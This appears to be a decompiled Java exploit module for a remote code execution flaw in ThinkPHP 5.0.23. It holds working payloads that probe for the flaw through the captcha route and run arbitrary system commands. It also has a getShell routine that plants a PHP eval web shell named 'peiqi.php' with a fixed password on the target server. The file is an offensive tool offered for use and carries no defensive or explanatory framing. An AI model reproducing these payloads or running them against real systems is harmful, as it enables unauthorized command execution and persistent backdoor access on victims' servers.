package exploit;

import com.github.kevinsawicki.http.HttpRequest;
import java.util.ArrayList;
import java.util.Iterator;
import util.BasePayload;
import util.Result;

/* loaded from: input_file:exploit/tp5023.class */
public class tp5023 implements BasePayload {
    @Override // util.BasePayload
    public Result checkVUL(String str) throws Exception {
        String str2 = str + "/?s=captcha&test=-1";
        Iterator<String> it = new ArrayList<String>() { // from class: exploit.tp5023.1
            {
                add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1");
                add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo");
                add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1");
            }
        }.iterator();
        while (it.hasNext()) {
            String next = it.next();
            try {
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (HttpRequest.post(str2).send(next).body().contains("PHP Version")) {
                return new Result(true, "ThinkPHP 5.0.23 RCE", str2 + " Post: " + next);
            }
            continue;
        }
        return new Result(false, "ThinkPHP 5.0.23 RCE", "");
    }

    @Override // util.BasePayload
    public Result exeVUL(String str, final String str2) throws Exception {
        String str3 = str + "/?s=captcha&test=-1";
        Iterator<String> it = new ArrayList<String>() { // from class: exploit.tp5023.2
            {
                add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + str2);
                add("s=" + str2 + "&_method=__construct&method=get&filter[]=system");
                add("s=" + str2 + "&_method=__construct&method&filter[]=system");
            }
        }.iterator();
        while (it.hasNext()) {
            try {
                String body = HttpRequest.post(str3).send(it.next()).body();
                String substring = body.substring(0, body.indexOf("<"));
                return substring.equals("") ? new Result(true, "", body) : new Result(true, "", substring);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return new Result(false, null, null);
    }

    @Override // util.BasePayload
    public Result getShell(String str) throws Exception {
        String str2 = str + "/?s=captcha&test=-1";
        ArrayList<String> arrayList = new ArrayList<String>() { // from class: exploit.tp5023.3
            {
                add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
                add("_method=__construct&filter[]=system&method=GET&get[]=echo '<?php @eval($_POST['peiqi'])?>' >>peiqi.php");
                add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','<?php%20@eval($_POST[%27peiqi%27])?>');");
                add("_method=__construct&filter[]=assert&method=GET&get[]=copy('<?php%20@eval($_POST[%27peiqi%27])?>', './peiqi.php');");
            }
        };
        for (int i = 0; i < arrayList.size(); i++) {
            try {
                HttpRequest.post(str2).send(arrayList.get(i)).body();
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (HttpRequest.get(str + "/peiqi.php").code() == 200) {
                return new Result(true, null, str + "/peiqi.php   Pass:peiqi");
            }
            continue;
        }
        return new Result(false, null, null);
    }
}
